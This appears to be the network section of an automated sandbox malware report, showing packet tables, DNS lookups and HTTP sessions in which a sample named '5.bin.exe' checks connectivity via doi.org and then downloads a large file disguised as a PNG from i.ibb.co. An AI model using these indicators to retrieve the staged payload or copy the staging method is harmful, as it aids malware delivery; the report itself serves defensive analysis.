                                                                                                                  Aug 29, 2023 19:16:42.211199999 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211245060 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211251020 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211263895 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211277008 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211299896 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211316109 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211323023 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211334944 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211347103 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211373091 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211374044 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211384058 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211425066 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211433887 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211443901 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211483955 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211488962 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211519957 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211527109 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211538076 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211563110 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211580992 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211610079 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211622953 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211632967 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211633921 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211678982 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211714029 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211720943 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211730003 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211746931 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211774111 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211776972 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211783886 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211826086 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211831093 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211844921 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211894035 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211894989 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211904049 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211949110 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.211949110 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.211958885 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212003946 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212049007 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212059021 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212073088 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212093115 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212099075 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212124109 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212131023 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212140083 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212169886 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212177992 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212215900 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212219954 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212229013 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212243080 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212272882 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212295055 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212302923 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212321043 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212325096 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212361097 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212384939 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212394953 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212414980 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212426901 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212455034 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212456942 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212466002 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212501049 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212526083 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212534904 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212547064 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212564945 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212583065 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212608099 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212614059 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212645054 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212651014 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212697983 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212701082 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212707996 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212743998 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212770939 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212778091 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212788105 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212838888 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212878942 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212918043 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212918043 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212918043 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212922096 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212934017 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.212934017 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212966919 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.212977886 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213023901 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213033915 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213047981 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213071108 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213078022 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213088036 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213112116 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213152885 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213160038 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213186979 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213202000 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213208914 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213227034 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213241100 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213262081 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213285923 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213301897 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213314056 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213316917 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213352919 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213390112 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213392019 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213399887 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213423967 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213440895 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213457108 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213464975 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213499069 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213505983 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213511944 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213547945 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213562012 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213568926 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213584900 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213596106 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213634014 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213638067 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213645935 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213675976 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213682890 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213689089 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213709116 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213720083 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213745117 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213751078 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213762999 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213778019 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213814020 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213840008 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213848114 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213860989 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213867903 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213898897 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213926077 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213932991 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213943005 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.213965893 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213990927 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.213996887 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214010000 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214034081 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.214040995 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214061022 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214068890 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.214106083 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214117050 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.214123964 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214154005 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.214154959 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214206934 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.214207888 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214217901 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214262009 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214265108 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.214312077 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214313030 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.214320898 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214364052 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:42.214373112 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214422941 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:42.214468002 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:52.735353947 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:52.742713928 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:52.973396063 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:52.973397017 CEST49712443192.168.2.4162.19.58.158
                                                                                                                  Aug 29, 2023 19:16:52.973473072 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:52.973501921 CEST44349712162.19.58.158192.168.2.4
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Aug 29, 2023 19:16:40.431005001 CEST4978553192.168.2.48.8.8.8
                                                                                                                  Aug 29, 2023 19:16:40.467104912 CEST53497858.8.8.8192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:40.860868931 CEST6387253192.168.2.48.8.8.8
                                                                                                                  Aug 29, 2023 19:16:40.896545887 CEST53638728.8.8.8192.168.2.4
                                                                                                                  Aug 29, 2023 19:16:41.613162994 CEST6336253192.168.2.48.8.8.8
                                                                                                                  Aug 29, 2023 19:16:41.641776085 CEST53633628.8.8.8192.168.2.4
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Aug 29, 2023 19:16:40.431005001 CEST192.168.2.48.8.8.80x4eaaStandard query (0)doi.orgA (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:40.860868931 CEST192.168.2.48.8.8.80x80fdStandard query (0)www.doi.orgA (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:41.613162994 CEST192.168.2.48.8.8.80x32bbStandard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Aug 29, 2023 19:16:40.467104912 CEST8.8.8.8192.168.2.40x4eaaNo error (0)doi.org104.26.8.237A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:40.467104912 CEST8.8.8.8192.168.2.40x4eaaNo error (0)doi.org172.67.72.147A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:40.467104912 CEST8.8.8.8192.168.2.40x4eaaNo error (0)doi.org104.26.9.237A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:40.896545887 CEST8.8.8.8192.168.2.40x80fdNo error (0)www.doi.orgdvjbn4sg4p1ck.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:40.896545887 CEST8.8.8.8192.168.2.40x80fdNo error (0)dvjbn4sg4p1ck.cloudfront.net18.165.183.85A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:40.896545887 CEST8.8.8.8192.168.2.40x80fdNo error (0)dvjbn4sg4p1ck.cloudfront.net18.165.183.55A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:40.896545887 CEST8.8.8.8192.168.2.40x80fdNo error (0)dvjbn4sg4p1ck.cloudfront.net18.165.183.26A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:40.896545887 CEST8.8.8.8192.168.2.40x80fdNo error (0)dvjbn4sg4p1ck.cloudfront.net18.165.183.6A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:41.641776085 CEST8.8.8.8192.168.2.40x32bbNo error (0)i.ibb.co162.19.58.158A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:41.641776085 CEST8.8.8.8192.168.2.40x32bbNo error (0)i.ibb.co162.19.58.159A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:41.641776085 CEST8.8.8.8192.168.2.40x32bbNo error (0)i.ibb.co162.19.58.156A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:41.641776085 CEST8.8.8.8192.168.2.40x32bbNo error (0)i.ibb.co162.19.58.161A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:41.641776085 CEST8.8.8.8192.168.2.40x32bbNo error (0)i.ibb.co162.19.58.157A (IP address)IN (0x0001)false
                                                                                                                  Aug 29, 2023 19:16:41.641776085 CEST8.8.8.8192.168.2.40x32bbNo error (0)i.ibb.co162.19.58.160A (IP address)IN (0x0001)false
                                                                                                                  • doi.org
                                                                                                                  • www.doi.org
                                                                                                                  • i.ibb.co
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.449710104.26.8.237443C:\Users\user\Desktop\5.bin.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-08-29 17:16:40 UTC0OUTGET / HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  User-Agent: WH
                                                                                                                  Host: doi.org
                                                                                                                  2023-08-29 17:16:40 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Tue, 29 Aug 2023 17:16:40 GMT
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  location: https://www.doi.org/
                                                                                                                  permissions-policy: interest-cohort=(),browsing-topics=()
                                                                                                                  Cache-Control: max-age=14400
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 7296
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bcchkW7Xl%2Bygxw3Nwbiv%2BH70NBxhFqa0lScCqmfMwxNEKn6iOpLJ3vNBnSfzPcle7v6uKLUrEmeO41%2FSDCX4JtLpTw25LK5ohm1zFreKc%2B4sxtr14keNcy8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 7fe6717319371e14-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.44971118.165.183.85443C:\Users\user\Desktop\5.bin.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-08-29 17:16:40 UTC0OUTGET / HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  User-Agent: WH
                                                                                                                  Host: www.doi.org
                                                                                                                  2023-08-29 17:16:41 UTC0INHTTP/1.1 200 OK
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 6819
                                                                                                                  Connection: close
                                                                                                                  Date: Tue, 29 Aug 2023 17:16:42 GMT
                                                                                                                  Last-Modified: Mon, 10 Apr 2023 08:52:49 GMT
                                                                                                                  ETag: "738314b5665f38027821605b70311c81"
                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                  x-amz-meta-md5chksum: 738314b5665f38027821605b70311c81
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Server: AmazonS3
                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                  Via: 1.1 01c82f5226ffef5f7e654ffdbab24db6.cloudfront.net (CloudFront)
                                                                                                                  X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                  X-Amz-Cf-Id: qfcdlfDXuvWC8W7YwtyKj9m7PW34KdjTl6E-_HuDYijZGlCcR5V8Cw==
                                                                                                                  2023-08-29 17:16:41 UTC1INData Raw: 1f 8b 08 00 00 00 00 00 00 ff cc 7c fd 72 db 36 16 ef df f6 4c df 01 cb 9d 94 72 23 91 92 3f 12 c7 91 d4 75 6d 27 71 36 b6 b3 b6 dc 34 9b c9 64 20 12 12 11 83 00 0b 80 92 d5 4e 66 f6 21 f6 9f fb 08 f7 35 ee a3 ec 93 dc 39 00 29 91 94 68 cb 69 f6 a3 9d 89 49 f0 9c 83 83 83 f3 f1 03 48 a1 fb a7 e3 8b a3 c1 fb b7 27 28 d2 31 eb 6f 76 e1 0f 62 98 8f 7b 0e e1 ad 54 39 d0 46 70 d8 df dc e8 c6 44 63 c4 71 4c 7a ce 98 70 22 b1 16 d2 41 81 e0 9a 70 dd 73 5e a5 63 81 da 5e a7 dd f1 da 0e f2 fb 9b 1b 39 4f 10 61 a9 88 ee 39 d7 83 17 ad 7d a7 22 6b 42 c9 34 11 52 17 44 4d 69 a8 a3 5e 48 26 34 20 2d 73 d3 44 94 53 4d 31 6b a9 00 33 d2 eb 2c a4 44 5a 27 2d f2 6b 4a 27 3d e7 97 d6 f5 61 eb 48 c4 09 d6 74 c8 48 41 e4 e9 49 8f 84 63 e2 14 d4 b2 dd e3 48 92 91 6a 29 aa 49
                                                                                                                  Data Ascii: |r6Lr#?um'q64d Nf!59)hiIH'(1ovb{T9FpDcqLzp"Aps^c^9Oa9}"kB4RDMi^H&4 -sDSM1k3,DZ'-kJ'=aHtHAIcHj)I


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.449712162.19.58.158443C:\Users\user\Desktop\5.bin.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-08-29 17:16:41 UTC8OUTGET /26Q0f9R/2870308898.png HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  User-Agent: WH
                                                                                                                  Host: i.ibb.co
                                                                                                                  2023-08-29 17:16:41 UTC8INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 29 Aug 2023 17:16:41 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 1938847
                                                                                                                  Connection: close
                                                                                                                  Last-Modified: Tue, 29 Aug 2023 05:41:00 GMT
                                                                                                                  Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                  Cache-Control: max-age=315360000
                                                                                                                  Cache-Control: public
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2023-08-29 17:16:41 UTC8INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a7 00 00 02 55 08 02 00 00 00 f5 3f ad 40 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 9c ec bd 77 98 5b d7 75 e8 bb 71 d0 7b ef bd 0c 06 c0 60 fa 70 1a c9 61 15 3b a9 6e 49 6e 72 62 3b b6 e5 38 71 72 73 f3 ee 1f f7 e5 e5 f9 25 f1 bd 37 f7 4b 9c 6b c7 89 2d d9 96 64 f5 ce 36 ec e4 b0 cc 70 fa 0c 38 0d d3 80 41 ef bd e3 e0 e0 bc 3f 8e 34 99 90 14 25 db 24 4d 4b f8 7d fc f4 01 38 fb ac bd cf c2 9e ad 8d b5 f6 5a 0b 17 8b 46 40 8d 1a 35 6a 7c 6e 80 7e df 03 a8 51 a3 46 8d fb 4a 6d d5 ab 51 a3 c6 e7 8b da aa 57 a3 46 8d cf 17 84 df f7 00 6a 7c 5e 60 1f 13 fc be 87 50 e3 b3 4f ea 48 f4 13 db d4 f6 7a 35 6a d4 f8 7c 51 db eb d5 b8 af e0 ff e8 f7 3d 82 1a 9f 51
                                                                                                                  Data Ascii: PNGIHDRU?@pHYs+ IDATxw[uq{`pa;nInrb;8qrs%7Kk-d6p8A?4%$MK}8ZF@5j|n~QFJmQWFj|^`POHz5j|Q=Q
